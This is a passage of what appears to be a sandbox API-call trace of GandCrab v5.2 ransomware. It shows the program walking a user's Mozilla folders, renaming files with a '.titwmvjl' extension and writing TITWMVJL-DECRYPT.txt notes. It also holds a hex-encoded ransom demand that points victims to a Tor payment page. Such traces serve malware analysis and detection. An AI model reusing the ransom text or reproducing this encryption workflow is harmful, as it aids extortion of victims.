x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.885] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0079.885] CloseHandle (hObject=0x2bc) returned 1 [0079.886] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.886] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.886] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0xca)) [0079.886] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.886] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.886] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.887] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a09d2ca4deb61a.lock") returned 81 [0079.887] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\extensions\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0079.888] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.888] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.888] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 57 [0079.888] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0079.888] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503978 [0079.888] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.888] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.889] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.889] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.889] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.889] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.889] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.889] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a09d2ca4deb61a.lock" [0079.889] lstrlenW (lpString=".titwmvjl") returned 9 [0079.889] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a09d2ca4deb61a.lock") returned 81 [0079.889] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.889] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 90 [0079.889] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a09d2ca4deb61a.lock") returned 81 [0079.889] lstrlenW (lpString=".lock") returned 5 [0079.889] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.889] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.889] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.890] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.890] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.890] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.890] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.890] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\TITWMVJL-DECRYPT.txt" [0079.890] lstrlenW (lpString=".titwmvjl") returned 9 [0079.890] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\TITWMVJL-DECRYPT.txt") returned 77 [0079.890] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.890] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 86 [0079.890] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\TITWMVJL-DECRYPT.txt") returned 77 [0079.890] lstrlenW (lpString=".txt") returned 4 [0079.890] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.890] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.890] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.890] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.891] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\TITWMVJL-DECRYPT.txt") returned 77 [0079.891] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\TITWMVJL-DECRYPT.txt") returned 77 [0079.891] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.891] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.891] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.891] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.891] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.891] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.891] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.891] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.891] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.891] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0079.891] FindClose (in: hFindFile=0x503978 | out: hFindFile=0x503978) returned 1 [0079.891] CloseHandle (hObject=0x2bc) returned 1 [0079.891] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.891] lstrcmpW (lpString1="Firefox", lpString2=".") returned 1 [0079.891] lstrcmpW (lpString1="Firefox", lpString2="..") returned 1 [0079.891] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="Firefox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox" [0079.891] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\" [0079.891] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.892] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.892] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.892] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.892] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.892] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.893] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.893] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\\\TITWMVJL-DECRYPT.txt") returned 75 [0079.893] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0079.893] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2